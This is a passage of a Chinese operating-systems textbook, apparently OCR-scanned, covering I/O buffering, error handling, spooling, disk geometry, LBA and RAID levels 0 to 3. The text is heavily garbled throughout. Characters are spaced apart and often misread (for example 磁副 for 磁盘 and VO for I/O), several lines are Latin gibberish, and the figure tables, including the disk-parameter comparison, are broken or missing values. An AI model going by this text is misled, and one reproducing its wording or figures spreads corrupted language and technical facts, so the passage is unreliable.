内 核 来 说 更 好 的 解决 方法 是 将 数据 复制 到 一 个 内 核 绥 冲 区 中 ， 与 图 5- 
15c 相 类 似 (但 是 是 男 一 个 方向 ) ， 并 且 立 刻 将 调用 者 解除 阻塞 。 现 在 
实际 的 VO 什么 时 候 完成 都 没有 关系 了 ， 用 户 一 旦 被 解除 阻塞 立刻 束 可 
以 目 由 地 重用 缓冲 区 。 


缓冲 是 一 种 广泛 采用 的 技术 ， 但 是 它 也 有 不 利 的 方面 。 如 果 数 据 
被 组 促 太 多 次 ， 性 能 束 会 降低 。 例 如 ， 考 虑 图 5-16 中 的 网 络 。 其 中 ， 一 
个 用 户 执行 了 一 个 系统 调用 加 网 络 写 数 据 。 内 核 将 数据 包 复制 到 一 个 
内 核 缓冲 区 中 ， 从 而 立即 使 用 户 进 程 得 以 继续 进行 〈 第 1 步 ) 。 在 此 
刻 ， 用 户 程序 可 以 重用 缓冲 区 。 


用 户 进程 


网 络 
i 
ieee | ma | 


PE 


图 5-16 可 能 涉及 多 次 复制 一 个 数据 包 的 网 络 


当 驱 动 程序 被 调用 时 ， 它 将 数据 包 复 制 到 控制 器 上 以 供 输出 (第 2 
步 ) 。 它 不 是 将 数据 包 从 内 核 内 存 直 接 输出 到 网 线 上 ， 其 原因 是 一 旦 
开始 一 个 数据 包 的 传输 ， 它 束 必 须 以 均匀 的 速度 继续 下 去 ， 了 驱动 程序 
不 能 保证 它 能 够 以 均匀 的 速度 访问 内 存 ， 因 为 DMA 通 道 与 其 他 IO 设备 
可 能 正在 守 取 许多 周期 。 不 能 及 时 获得 一 个 字 将 毁坏 数据 包 ， 而 通过 
在 控制 器 内 部 对 数据 包 进行 缓冲 束 可 以 避免 这 一 问题 。 


当 数 据 包 复 制 到 控制 夯 的 内 部 缓冲 区 中 之 后 ， 它 就 会 被 复制 到 网 
络 上 〈 第 3 步 ) 。 数 据 位 被 发 送 之 后 立刻 就 会 到 达 接 收 器 ， 所 以 在 最 后 
一 位 刚刚 送出 之 后 ， 该 位 融 到 达 了 接收 船 ， 在 这 里 数据 包 在 控制 套 中 
被 缓冲 。 接 下 来 ， 数 据 包 复 制 到 接收 器 的 内 核 缓冲 区 中 〈 第 4 步 ) © Be 


后 ， 它 被 复制 到 接收 进程 的 缓冲 区 中 (第 5 步 ) 。 然 后 接收 器 通常 会 发 
回 一 个 应 答 。 当 发 送 者 得 到 应 答 时 ， 它 就 可 以 自由 地 发 送 下 一 个 数据 
包 。 然 而 ， 应 该 清 区 的 是 ， 所 有 这 些 复制 操作 都 会 在 很 大 程度 上 降低 
传输 速率 ， 因 为 所 有 这 些 步 又 必须 有 序 地 发 生 。 


3. 错 误 报告 


错误 在 MO 上 下 文中 比 在 其 他 上 下 文中 要 和 音 见 得 多 。 当 氏 误 发 生 
时 ， 操 作 系统 必须 尽 最 大 努力 对 它们 进行 处 理 。 许 多 错误 是 设备 特定 
的 并 且 必 须 由 适当 的 张 动 程序 来 处 理 ， 但 是 错误 处 理 的 框架 是 设备 无 
KHY ° 


— PPR ALA REIER, AERA EE NEE ORR 
些 不 可 能 的 事情 时 ， 例 如 写 一 个 输入 设备 EN > A > ben) 
或 者 读 一 个 输出 设备 (打印 机 、 绘 图 仪 等 )。 其 他 的 错误 包括 提供 了 
一 个 无 效 的 缓冲 区 地 址 或 者 其 他 参数 ， 以 及 指定 了 一 个 无 效 的 设备 
(例如 ， 当 系统 只 有 两 块 磁盘 时 指定 了 磁 副 3) ， 如 此 等 等 。 在 这 些 错 
充 上 采取 的 行动 是 直截了当 的 : 只 是 将 一 个 销 误 代码 报告 返回 给 调用 
者 。 


另 一 种 类 型 的 错误 是 实际 的 MO 销 误 ， 例 如 ， 试 图 写 一 个 已 经 被 破 
坏 的 磁 表 块 ， 或 者 试图 读 一 个 已 经 关机 的 便携 式 摄像 机 。 在 这 些 情形 


中 ， 应 该 由 驱动 程序 决定 做 什么 。 WORE RAE BUT, ERY 
该 将 问题 同上 传递 ， 返 回 给 与 设备 无 关 的 软件 。 


软件 要 做 的 事情 取决 于 环境 和 错误 的 本 质 。 如 果 是 一 个 简单 的 读 
错误 并 且 和 存在 一 个 交互 式 的 用 户 可 利用 ， 那 么 它 整 可 以 显示 一 个 对 话 
框 来 询问 用 户 做 什么 。 远 项 可 能 包括 重 试 一 定 的 次 数 ， 名 了 略 错 误 ， 或 
AAR ICY HEFE o 如果 没有 用 户 可 利用 ， 惟 一 的 实际 选择 或 许 束 古 以 
一 个 错误 代码 让 系统 调用 失败 。 


然而 ， 某 些 错误 不 能 以 这 样 的 方式 来 处 理 。 例 如 ， 关 键 的 数据 结 
H 〈 如 根 目 录 或 空闲 块 列表 ) 可 能 已 经 被 破坏 ， 在 这 种 情况 下 ， 系 统 


也 许 只 好 显示 一 条 错误 消息 并 且 终止 。 
4. 分 配 与 释放 专用 设备 


某 些 设备 ， 例 如 CD-ROM 刻 录 机 ， 在 任意 给 定 的 时 刻 只 能 由 一 个 
进程 使 用 。 这 束 要 求 操作 系统 对 设备 使 用 的 请 求 进行 检查 ， 并 且 根 据 
极 请 求 的 设备 是 人 否 可 用 来 接受 或 者 拒绝 这 些 请 求 。 处 理 这 些 请 求 的 一 
种 简单 方法 是 要 求 进 程 在 代表 设备 的 特殊 文件 上 直接 执行 open 操 作 。 
如 琳 设 备 十 不 可 用 的 ， 那 么 open 束 会 失败 。 于 是 束 关 闭 这 样 的 一 个 专 
用 设备 ， 然 后 将 其 释放 。 


一 种 代替 的 方法 是 对 于 请 求 和 释放 专用 设备 要 有 特殊 的 机 制 。 试 
图 得 到 不 可 用 的 设备 可 以 将 调用 着 阻塞 ， 而 不 是 让 其 失败 。 阻 蹇 的 进 


程 被 放 入 一 个 队列 。 述 早 被 请 求 的 设备 会 变 得 可 用 ， 这 时 就 可 以 让 队 
列 中 的 第 一 个 进程 得 到 该 设备 并 且 继 续 执 行 。 


5. 与 设备 无 关 的 块 大 小 


不 同 的 磁盘 可 能 具有 不 同 的 局 区 大 小 。 应 该 由 与 设备 无 关 的 软件 
来 隐藏 这 一 事实 并 且 向 高 层 提供 一 个 统一 的 块 大 小 ， 例 如 ， 将 辱 干 个 
鹿 区 当 作 一 个 逻辑 块 。 这 样 ， 高 层 软件 就 只 需 处 理 抽 象 的 设备 ， 这 些 
抽象 设备 全 都 使 用 相同 的 逻辑 块 大 小 ， 与 物理 忆 区 的 大 小 无 天 。 类 似 
地 ， 某 些 字符 设备 (如 调制 解 调 器 ) 一 次 一 个 字 市 地 交付 它们 的 数 
据 ， 而 其 他 的 设备 (如 网 络 接口 ) 则 以 较 大 的 单位 交付 它们 的 数据 。 
这 些 老 异 也 可 以 被 隐藏 起 来 。 


5.3.4 用 户 空 间 的 IO 软件 


尽管 大 部 分 VO 软件 都 在 操作 系统 内 部 ， 但 是 仍然 有 一 小 部 分 在 用 
户 空间 ， 包 括 与 用 户 程序 连接 在 一 起 的 库 ， 甚 至 完全 运行 于 内 核 之 外 
的 程序 。 系 统 调用 (包括 WO 系统 调用 ) 通常 由 库 过 程 实现 。 当 一 个 C 
程序 包含 调用 


count=write(fd,buffer,nbytes); 


时 ， 库 过 程 write 将 与 该 程序 连接 在 一 起 ， 并 包含 在 运行 时 出 现在 
内 存 中 的 二 进 制程 序 中 。 所 有 这 些 库 过 程 的 集合 显然 是 1/O 系 统 的 组 成 


pare 


Ik 


虽然 这 些 过 程 所 做 的 工作 不 过 是 将 这 些 参数 放 在 合适 的 位 置 供 系 
统 调用 使 用 ， 但 是 确 有 其 他 IO 过 程 实际 实现 真正 的 操作 。 输 入 和 输出 
的 格式 化 是 由 库 过 程 完成 的 。 一 个 例子 是 C 语 言 中 的 printf， 它 以 一 个 
格式 串 和 可 能 的 一 些 变量 作为 输入 ， 构 造 一 个 ASCI 字 符 串 ， 然 后 调用 
write 以 输出 这 个 串 。 作 为 printf 的 一 个 例子 ， 考 虚 语 句 


printf("The square of%3d is%6d\n",i,i *i); 


该 语句 格式 化 一 个 字符 串 ， 该 字符 串 是 这 样 组 成 的 ， 先 是 14 个 字 
符 的 串 “The square of? (注意 of 后 有 一 个 空格 ) ， 随 后 是 i 值 作为 3 个 字 


IE, ARETAN” (注意 前 后 各 有 一 个 空格 ) ， 然 后 是 六 
值 作 为 6 个 字符 的 串 ， 最 后 是 一 个 换行 。 


对 输入 而 言 ， 类 似 过 程 的 一 个 例子 是 scanf， 它 读 取 输入 并 将 其 存 
放 到 一 些 变量 中 ， 采 用 与 printf 同 样 语法 的 格式 串 来 描述 这 些 变 量 。 标 
准 的 IO 库 包 含 许多 涉及 IO 的 过 程 ， 它 们 都 是 作为 用 户 程序 的 一 部 分 运 
行 的 。 


并 非 所 有 的 用 户 层 IO 软件 都 是 由 库 过 程 组 成 的 。 另 一 个 重要 的 类 
别 是 假 脱 机 系统 。 假 脱 机 (spooling) 是 多 道 程序 设计 系统 中 人 处 理 独 占 
LO 设备 的 一 种 方法 。 考 虑 一 种 典型 的 假 脱 机 设备 ， 打 印 机 。 尽 管 在 技 
术 上 可 以 十 分 容易 地 让 任何 用 户 进程 打开 表示 该 打印 机 的 子 符 特殊 文 
件 ， 但 是 假如 一 个 进程 打开 它 ， 然 后 很 长 时 间 不 使 用 ， 则 其 他 进程 都 
无 法 打印 。 


男 一 种 方法 是 创建 一 个 特殊 进程 ， 称 为 守护 进程 (daemon) ， 以 
及 一 个 特殊 目录 ， 称 为 假 脱 机 目录 (spooling directory) 。 一 个 进程 要 
打印 一 个 文件 时 ， 冯 先生 成 要 打印 的 整个 文件 ， 并 且 将 其 放 在 假 脱 机 
目 好 下。 由 守护 进程 打印 该 目录 下 的 文件 ， 该 进程 是 允许 使 用 打印 机 
特殊 文件 的 惟一 进程 。 通 过 保护 特殊 文件 来 防止 用 户 直 接 使 用 ， 可 以 
解决 菜 些 进程 不 必要 地 长 期 空 占 打印 机 的 问题 。 


假 脱 机 不 仅仅 用 于 打印 机 ， 还 可 以 在 其 他 情况 下 使 用 。 例 如 ， 通 
过 网 络 传输 文件 单单 使 用 一 个 网 络 守 护 进 程 。 要 发 送 一 个 文件 到 某 个 
地 方 ， 用 户 可 以 将 该 文件 放 在 一 个 网 络 假 脱 机 目 孙 下 。 稍 后 ， 由 网 络 
守护 进程 将 其 取出 并 且 发 送出 去 。 这 种 假 脱 机 文件 传输 方式 的 一 个 特 
定 用 途 是 USENET 新 闻 系 统 ， 该 网 络 由 世界 上 使 用 因特网 进行 通信 的 成 
千 上 万 台 计 算 机 组 成 ， 针 对 许多 话题 存在 着 几 干 个 新 闻 组 。 要 发 送 一 
条 新 闻 消 息 ， 用 户 可 以 调用 新 闻 程序 ， 该 程序 接收 要 发 出 的 消息 ， 然 
后 将 其 存放 在 假 脱 机 目 如 中， 得 以 后 发 送 到 其 他 计算 机 上 。 整 个 新 闻 
系统 旦 在 操作 系统 之 外 运行 的 。 


图 5-17 对 WO 系统 进行 了 总 结 ， 给 出 了 所 有 层次 以 及 每 一 层 的 主要 
功能 。 从 底部 开始 ， 这 些 层 是 硬件 、 中 断 处 理 程序 、 设 备 驱 动 程序 、 
与 设备 无 关 的 软件 ， 最 后 是 用 户 进 程 。 


1 请 求 


层次 IO 应 答 IO 功能 _ 


与 设备 无 关 的 软件 


产生 IO 请 求 ， 对 IO 进行 格 . 
式 化 ; 假 脱 机 
命名 、 保 护 、 分 块 、 缓 冲 、 

分 配 | 


设置 设备 寄存 器 ， 检 查 状态 


I/O 


设备 驱动 程序 


中 断 处 理 程 序 


图 5-17 IO 系统 的 层次 以 及 每 一 层 的 主要 功能 


当 I/O 完 成 时 唤醒 驱动 程序 


执行 IO 操作 


图 5-17 中 的 箭头 表明 了 控制 流 。 例 如 ， 当 一 个 用 户 程 序 试图 从 一 个 


文件 中 读 一 个 块 时 ， 操 作 系 统 被 调用 以 实现 这 一 请 求 。 与 设备 无 关 的 
软件 在 缓冲 区 高 速 缓存 中 查找 有 无 要 读 的 块 。 如 采 需 要 的 块 不 在 其 
中 ， 则 调用 设备 驱动 程序 ， 向 硬件 发 出 一 个 请 求 ， 让 它 从 磁盘 中 获取 
该 块 。 然 后 ， 进 程 被 阻塞 直到 磁 副 操作 完成 。 


当 磁 副 操作 完成 时 ， 硬 件 产生 一 个 中 断 。 中 断 处 理 程序 就 会 运 


行 ， 它 要 查 明 发 生 了 什么 事情 ， 也 束 是 说 此 刻 需 要 关注 哪个 设备 。 然 
后 ， 中 断 处 理 程序 从 设备 提取 状态 信息 ， 唤 醒 休 眠 的 进程 以 结束 此 次 
IO 请 求 ， 并 且 让 用 户 进程 继续 运行 。 


5.4 


现在 我 们 开始 研究 某 些 实际 的 VO 设备 。 我 们 将 从 盘 开 始 ， 盘 的 概 
念 侧 单 ， 但 十 非常 重要 。 然 后 ， 我 们 将 研究 时 钟 、 键 盘 和 显示 如 。 


5.4.1 KITEE 


盘 具有 多 种 多 样 的 类 型 。 最 为 常用 的 是 磁盘 《硬盘 和 软盘 ) ， 它 
们 具有 读 写 速度 同样 快 的 特点 ， 这 使 得 它们 成 为 理想 的 辅助 存储 器 
(用 于 分 页 、 文 件 系统 等 ) 。 这 些 副 的 阵列 有 时 用 来 提供 高 可 靠 性 的 
存储 器 。 对 于 程序 、 数 据 和 电影 的 发 行 而 言 ， 各 种 光 强 (CD-ROM ` 
可 刻录 CD 以 及 DVD) 也 非常 重要 。 在 下 面 各 小 节 中 ， 我 们 首先 描述 这 
些 设备 的 人 硬件， 然后 摘 述 其 软件 。 


1RR 


磁盘 被 组 织 成 柱 面 ， 每 一 个 柱 面包 含 若 干 磁 道 ， 磁 道 数 与 垂直 堆 
琶 的 磁头 个 数 相同 。 磁 道 又 被 分 成 若干 而 区 ， 软 盘 上 大 约 每 条 磁道 有 8 
~32 个 局 区 ， 硬 盘 上 每 条 磁道 上 局 区 的 数目 可 以 多 达 儿 百人 个。 磁头 数 
大 约 是 1~16 个 。 


老式 的 磁盘 只 有 少量 的 电子 设备 ， 它 们 只 是 传送 简单 的 串 行 位 
流 。 在 这 些 磁盘 上 ， 控 制 器 做 了 大 部 分 的 工作 。 在 其 他 磁盘 上 ， 特 别 
是 在 IDE (Integrated Drive Electronics， 集 成 驱动 电子 设备 ) 和 SATA 
Serial ATA, R4TATA) ALL, WEAK aA eal a , 
微 控 制 器 承担 了 大 量 的 工作 并 且 人 允许 实际 的 控制 器 发 出 一 组 高 级 命 
令 。 控 制 硕 经 常 做 磁道 高 速 缓存 、 坏 块 重 映 射 以 及 更 多 的 工作 。 


< 


( 
该 


对 磁盘 张 动 程 序 有 重要 意义 的 一 个 设备 特性 是 : 控制 器 是 否 可 以 
Pe Na hl PN ES MER eT SE, He HSE (overlapped 
seek) 。 当 控制 器 和 软件 等 待 一 个 驱动 器 完成 寻 道 时 ， 控 制 器 可 以 同时 
局 动 男 一 个 驱动 幕 进行 寻 道 。 许 多 控制 右 也 可 以 在 一 个 驱动 事 上 进行 
读 写 操作 ， 与 此 同时 再 对 为 一 个 或 多 个 其 他 驱动 如 进行 寻 道 ， 但 是 软 
盘 控 制 器 不 能 在 两 个 驱动 器 上 同时 进行 读 写 操作 。 〈 读 写 数据 要 求 控 
制 器 在 微 秒 级 时 间 尺 度 传输 数据 ， 所 以 一 次 传输 就 用 完了 控制 器 大 部 
分 的 计算 能 力 。) 对 于 具有 集成 控制 器 的 硬 副 而 言情 况 就 不 同 了 ， 在 
具有 一 个 以 上 这 种 硬盘 驱动 做 的 系统 上 ， 它 们 能 够 同时 操作 ， 至 少 在 
人 磁盘 与 控制 右 的 绥 冲 存储 器 之 间 进 行 数据 传输 的 限度 之 内 是 这 样 。 然 
而 ， 在 控制 器 与 主 存 之 间 可 能 同时 只 有 一 次 传输 。 同 时 执行 两 个 或 多 
个 操作 的 能 力 极 大 地 降低 了 平均 存 取 时 间 。 


图 5-18 比 较 了 最 初 的 IBM PC 标准 存储 介质 的 参数 与 20 年 后 制造 的 
磁盘 的 参数 ， 从 中 可 以 看 出 过 去 20 年 磁盘 发 生 了 多 大 的 变化 。 有 趣 的 


是 ， 可 以 注意 到 并 不 是 所 有 的 参数 都 具有 同样 程度 的 改进 。 平 均 寻 道 
时 间 改 进 了 7 倍 ， 传 输 率 改进 了 1300 倍 ， 而 容量 的 改进 则 高 达 50 000 
倍 。 这 一 格局 主要 是 因为 磁盘 中 运动 部 件 的 改进 相对 和 组 渐进 ， 而 记 
录 表 面 则 达到 了 相当 高 的 位 密度 。 


参数 IBM 360KB 软 盘 WD 18300 硬 盘 

柱 面 数 40 10 601 

每 柱 面 磁道 数 和 12 

每 磁道 扇 区 数 9 81 (平均 ) | 
每 磁盘 扇 区 数 35 742 000 
每 扇 区 字 节 数 512 

磁盘 容量 360KB | 18.3GB 

寻 道 时 间 〈 相 邻 柱 面 ) 6ms 0.8ms 

寻 道 时 间 (平均 情况 ) 77ms a i 6.9ms 
旋转 时 间 200ms 8.33ms 
电动 机 停止 /启动 时 间 250ms | 20ms 
传输 1 个 扇 区 的 时 间 = xs 


Al 5-18 最 初 的 IBM PC 360KB ASA EAE FA] WD 1830088 
BBN 


在 阅读 现代 人 硬盘 的 说 明 书 时 ， 要 清楚 的 事情 是 标 称 的 几何 规格 以 
及 驱动 程序 软件 使 用 的 几何 规格 与 物理 格式 几乎 总 是 不 同 的 。 在 老式 
的 磁盘 上 ， 每 磁道 悄 区 数 对 所 有 柱 面 都 是 相同 的 。 而 现代 磁盘 则 被 划 
分 成 环 带 ， 外 层 的 环 沉 比 内 层 的 环 市 拥有 更 多 的 悄 区 。 图 5-19a 所 示 为 
一 个 微小 的 磁 强 ， 它 具有 两 个 环 带 ， 外 层 的 环 带 每 磁道 有 32 个 扇 区 ， 
内 层 的 环 带 每 磁道 有 16 个 局 区 。 一 个 实际 的 磁盘 (例如 WD 18300) #4 


常 有 16 个 环 带 ， 从 最 内 层 的 环 带 到 最 外 层 的 环 带 ， 每 个 环 带 的 肩 区 数 
增加 大 约 496 。 


图 5-19 a) 具 有 两 个 环 带 的 磁盘 的 物理 几何 规格 ，b) 该 磁 副 的 一 种 可 
能 的 虚拟 几何 规格 


为 了 隐藏 每 个 磁道 有 多 少 扇 区 的 细节 ， 大 多 数 现代 磁盘 都 有 一 个 
虚拟 几何 规格 呈现 给 操作 系统 。 软 件 在 工作 时 仿佛 存在 着 x 个 柱 面 、y 
个 磁头 、 每 磁道 z 个 而 区 ， 而 控制 器 则 将 对 (x,y,z) 的 请 求 重 映射 到 实际 
的 柱 面 、 磁 头 和 扇 区 。 对 于 图 5-19a 中 的 物理 磁盘 ， 一 种 可 能 的 虚拟 几 
何 规格 如 图 5-19b 所 示 。 在 两 种 情形 中 位 弄 拥有 的 扇 区 数 都 是 192， 只 不 
过 公布 的 排列 与 实际 的 排列 是 不 同 的 。 
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63) ， 这 是 因为 需要 与 最 初 IBM PC 的 限制 向 后 兼容 。 在 IBM PC 机 器 

上 ,使 用 16 位 、4 位 和 6 位 的 字段 来 设 定 这 些 参数 ， 其 中 柱 面 和 扇 区 从 1 
开始 编号 ， 磁 头 从 0 开始 编号 。 根 据 这 些 参数 以 及 每 个 忆 区 512 字 节 可 

知 ， 磁 盘 最 大 可 能 的 容量 是 31.5GB。 为 突破 这 一 限制 ， 所 有 现代 磁 副 
现在 都 支持 一 种 称 为 逻辑 块 寻 址 (logical block addressing, LBA) 的 系 
统 ， 在 这 样 的 系统 中 ， 磁 盘 扇 区 从 0 开始 连续 编号 ， 而 不 管 磁盘 的 几何 
规格 如 何 。 


2.RAID 


在 过 去 十 多 年 里 ，CPU 的 性 能 一 直 呈 现 出 指数 增长 ， 大 体 上 每 18 
个 月 翻 一 番 。 但 是 磁盘 的 性 能 束 不 是 这 样 了 。20 世 纪 70 年 代 ， 小 型 计 
算 机 磁 副 的 平均 寻 道 时 间 是 50~100 毫 秒 ， 现 在 的 寻 道 时 间 略 微 低 于 10 
训 秒 。 在 大 多 数 技术 产业 (如 汽车 业 或 航空 业 ) 中 ， 在 20 年 之 内 有 5~ 
10 倍 的 性 能 改进 就 将 是 重大 的 新 闻 (想象 300 MPG 的 轿车 ) ， 但 是 
FEW RAL EL, hele SE > AIL, CPUTERE S RA PERE Z IA 
的 差距 随 着 时 间 的 推移 将 越 来 越 大 。 


正如 我 们 已 经 看 到 的 ， 为 了 提高 CPU 的 性 能 ， 越 来 越 多 地 使 用 了 
并 行 处 理 。 在 过 去 许多 年 ， 很 多 人 也 意识 到 并 行 WO 是 一 个 很 好 的 思 
想 。Patterson 等 人 在 他 们 1988 年 写 的 文章 中 提出 ， 使 用 六 种 特殊 的 磁盘 
组 织 可 能 会 改进 磁盘 的 性 能 、 可 靠 性 或 者 同时 改进 这 两 者 (Patterson 等 


A, 1988) 。 这 些 思想 很 快 被 工业 界 所 采纳 ， 并 且 导 致 称 为 RAID 的 一 
种 新 型 IO 设备 的 诞生 。Patterson 等 人 将 RAID 定 义 为 Redundant Array of 
Inexpensive Disk (廉价 磁盘 见 余 阵列  ， 但 是 工业 界 将 I 重 定 义 为 
Independent (独立 ) 而 不 是 Inexpensive (廉价 ) ， 或 许 这 样 他 们 就 可 以 
收取 更 多 的 费用 ? 因为 反面 角色 也 是 需要 的 (如 同 RISC 对 CISC， 这 也 
是 源 于 Patterson) ， 此 处 的 “ 坏 家 伙 ” 是 SLED 
Disk， 单 个 大 容量 昂贵 磁盘 ) 。 


Single Large Expensive 


RAID aa AS A AR T ENR PERETTI 
(通常 是 一 个 大 型 服务 器 ) 上 ， 用 RAID 控 制 器 替换 磁盘 控制 器 卡 ， 将 
数据 复制 到 整个 RAID 上， 然后 继续 常规 的 操作 。 换 言 之 ， 对 操作 系统 
言 一 个 RAID 应 该 看 起 来 就 像 是 一 个 SLED， 但 是 具有 更 好 的 性 能 和 
更 好 的 可 靠 性 。 由 于 SCSI 盘 具有 良好 的 性 能 、 较 低 的 价格 并 且 在 单个 
控制 器 上 能 够 容纳 多 达 7 个 驱动 器 (对 宽 型 SCSI 而 言 是 15 个 ) ， 很 自然 
地 大 多 数 RAID 由 一 个 RAID SCSI 探 制 器 加 上 一 个 装 满 了 SCSI 盘 的 盒子 
组 成 ， 而 对 操作 系统 而 言 这 似乎 就 是 一 个 大 容量 磁盘 。 以 这 样 的 方 
法 ， 不 需要 软件 做 任何 修改 就 可 以 使 用 RAID， 对 于 许多 系统 管理 员 来 


说 这 可 是 一 大 卖点 。 


除了 对 软件 而 言 看 起 来 融 像 征 一 个 磁盘 以 外 ， 所 有 的 RAID 都 具有 
同样 的 特性 ， 那 惑 是 将 数据 分 布 在 全 部 驱动 器 上 ， 这 样 就 可 以 并 行 操 
作 。Patterson 等 人 为 这 样 的 操作 定义 了 几 种 不 同 的 模式 ， 它 们 现在 被 称 


为 0 级 RAID 到 5 级 RAID。 此 外 ， 还 有 少许 其 他 的 辅助 层级 ， 我 们 就 不 
讨论 了 。“ 层 级 ”这 一 术语 多 少 有 一 些 用 词 不 当 ， 因 为 此 处 不 存在 分 层 
结构 ， 它 们 只 是 可 能 的 六 种 不 同 组 织 形式 而 已 。 


0 级 RAID 如 图 5-20a 所 示 。 它 将 RAID 模 拟 的 虚拟 单个 磁盘 划分 成 条 
带 ， 每 个 条 带 具 有 k 个 言 区， 其 中 局 区 0~k-1 为 条 带 0， 局 区 k~~2k-1 为 
条 带 1， 以 此 类 推 。 如 果 k=1， 则 每 个 条 带 是 一 个 而 区 ; 如 果 k=2， 则 每 
个 条 人 带 是 两 个 扇 区 ; 以 此 类 推 。0 级 RAID 结 构 将 连续 的 条 带 以 轮转 方 
式 写 到 全 部 驱动 器 上 ， 图 5-20a 所 示 为 具有 四 个 磁盘 驱动 器 的 情形 。 


像 这 样 将 数据 分 布 在 多 个 驱动 器 上 称 为 划分 条 带 (striping) 。 例 
如 ， 如 有 果 软 件 发 出 一 条 命令 ， 读 取 一 个 由 四 个 连续 条 市 组 成 的 数据 
块 ， 并 且 数 据 块 起 始 于 条 市 和 边界， 那么 RAID 探 制 奏 融会 将 该 命令 分 解 
为 四 条 单独 的 命令 ， 每 条 命令 对 应 四 块 磁 副 中 的 一 块 ， 并 且 让 它们 并 
行 操作 。 这 样 我 们 就 运用 了 并 行 WO 而 软件 并 不 知道 这 一 切 。 


0 级 RAID 对 于 大 数据 量 的 请 求 工作 性 能 最 好 ， 数 据 量 越 大 性 能 束 
越 好 。 如 末 请 求 的 数据 量 大 于 驱动 紫 数 乘 以 条 市 大 小 ， 那 么 茶 些 驱动 
右 将 得 到 多 个 请 求 ， 这 样 当 它们 完成 了 第 一 个 请 求 之 后 ， 束 会 开始 处 
理 第 二 个 请 求 。 控 制 器 的 责任 是 分 解 请 求 ， 并 且 以 正确 的 顺序 将 适当 
的 命令 提供 给 适当 的 磁盘 ， 之 后 还 要 在 内 存 中 将 结 采 正确 地 闪 配 起 
来 。0 级 RAID 的 性 能 是 态 出 的 而 实现 是 简单 明了 的 。 


对 于 习惯 于 每 次 请 求 一 个 而 区 的 操作 系统 ，0 级 RAID 工 作 性 能 最 
为 糟糕 。 虽 然 结 果 会 是 正确 的 ， 但 是 却 不 存在 并 行 性 ， 因 此 也 就 没有 

进 性 能 。 这 一 结构 的 另 一 个 劳 势 是 其 可 靠 性 潜在 地 比 SLED 还 要 差 。 
如 果 一 个 RAID 由 四 块 磁 盘 组 成 ， 每 块 磁盘 的 平均 故障 间隔 时 间 是 20 
000 小 时 ， 那 么 每 隔 5000 小 时 就 会 有 一 个 驱动 侨 出 现 故 障 并 且 所 有 数 据 
将 完全 丢失 。 与 之 相 比 ， 平 均 故 障 间 隔 时 间 为 20 000 小 时 的 SLED 的 可 
靠 性 要 高 出 四 倍 。 由 于 在 这 一 设计 中 未 引入 见 余 ， 实 际 上 它 还 不 是 真 
正 的 RAID。 


下 一 个 选择 一 一 1 级 RAID 如 图 5-20b 所 示 ， 这 是 一 个 真正 的 RAID 。 

它 复制 了 所 有 的 磁盘 ， 所 以 存在 四 个 主 磁 盘 和 四 个 备份 磁盘 。 在 执行 
一 次 写 操 作 时 ， 每 个 条 带 都 被 写 了 两 次 。 在 执行 一 次 读 操 作 时 ， 则 可 
以 使 用 其 中 的 任意 一 个 副本 ， 从 而 将 负 葵 分 布 在 更 多 的 驱动 器 上 。 因 
此 ， 写 性 能 并 不 比 单个 驱动 器 好 ， 但 是 读 性 能 能 够 比 单个 驱动 器 高 
两 倍 。 容 错 性 是 突出 的 : 如果 一 个 驱动 妖 朋 演 了 ， 只 要 用 副本 来 蔡 代 
就 可 以 了 。 人 恢复 也 十 分 简单 ， 只 要 安装 一 个 新 驱动 器 并 且 将 整个 备份 
Ras Hl PA FAT LAT e 


0 级 RAID 和 1 级 RAID 操 作 的 是 局 区 条 上 市， 与 此 不 同 ，2 级 RAID 工 作 
在 字 的 基础 上 ， 其 至 可 能 是 字 节 的 基础 上 。 想 象 一 下 将 单个 虚拟 磁盘 
的 每 个 字 市 分 割 成 4 位 的 半 字 市 对 ， 然 后 对 每 个 半 字 市 加 入 一 个 汉 明 码 
从 而 形成 7 位 的 字 ， 其 中 1、2、4 位 为 奇偶 校 验 位 。 进 一 步 想象 如 图 5- 
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Thinking Machine 公 司 的 CM-2 计 算 机 采用 了 这 一 方案 ， 它 采用 32 位 
数据 字 并 加 入 6 个 奇偶 校 验 位 形成 一 个 38 位 的 汉 明 字 ， 再 加 上 一 个 额外 
的 位 用 于 汉 明 字 的 奇偶 校 验 ， 并 且 将 每 个 字 分 布 在 39 个 磁盘 驱动 器 
上 。 因 为 在 一 个 扇 区 时 间 里 可 以 写 32 个 扇 区 的 数据 ， 所 以 总 的 吞吐 量 
是 巨大 的 。 此 外 ， 一 个 驱动 器 的 损坏 不 会 引起 问题 ， 因 为 损坏 一 个 驱 
动 器 等 同 于 在 每 个 39 位 字 的 读 操作 中 损失 一 位 ， 而 这 是 汉 明 码 可 以 轻 
松 处 理 的 事情 。 


不 利 的 一 面 症 ， 这 一 方案 要 求 所 有 驱动 右 的 旋转 必须 同步 ， 并 且 
只 有 在 驱动 器 数量 很 充裕 的 情况 下 才 有 意义 (即使 对 于 32 个 数据 驱动 
器 和 6 个 奇偶 驱动 器 而 言 ， 也 存在 19% 的 开销 ) 。 这 一 方案 还 对 控制 器 
提出 许多 要 求 ， 因 为 它 必 须 在 每 个 位 时 间 里 求 汉 明 校 验 和 。 


3 级 RAID 是 2 级 RAID 的 简化 版 本 ， 如 图 5-20d 所 示 。 其 中 要 为 每 个 
数据 字 计 算 一 个 奇偶 校 验 位 并 且 将 其 写 入 一 个 奇偶 驱动 器 中 。 与 2 级 
RAID 一 样 ， 各 个 驱动 器 必须 精确 地 同步 ， 因 为 每 个 数据 字 分 布 在 多 个 
驱动 右上 。 


乍 一 想 ， 似 乎 单个 奇偶 校 验 位 只 能 检测 错误 ， 而 不 能 纠正 错误 。 
对 于 随机 的 未 知 错误 的 情形 ， 这 样 的 看 法 是 正确 的 。 然 而 ， 对 于 驱动 
器 朋 江 这 样 的 情形 ， 由 于 坏 位 的 位 置 是 已 知 的 ， 所 以 这 样 做 完全 能 够 
纠正 1 位 错误 。 如 果 一 个 驱动 器 崩溃 了 ， 控 制 器 只 需 假装 该 驱动 器 的 所 
有 位 为 0， 如 果 一 个 字 有 奇偶 错误 ， 那 么 来 自 废 弃 了 的 驱动 右上 的 位 原 
来 一 定 是 1， 这 样 就 纠正 了 错误 。 尽 管 2 级 RAID 和 3 级 RAID 两 者 都 提供 
了 非常 高 的 数据 率 ， 但 是 每 秒 钟 它 们 能 够 处 理 的 单独 的 MO 请 求 的 数目 
并 不 比 单个 驱动 器 好 。 


4 级 RAID 和 5 级 RAID 再 次 使 用 条 带 ， 而 不 是 具有 奇偶 校 验 的 单个 
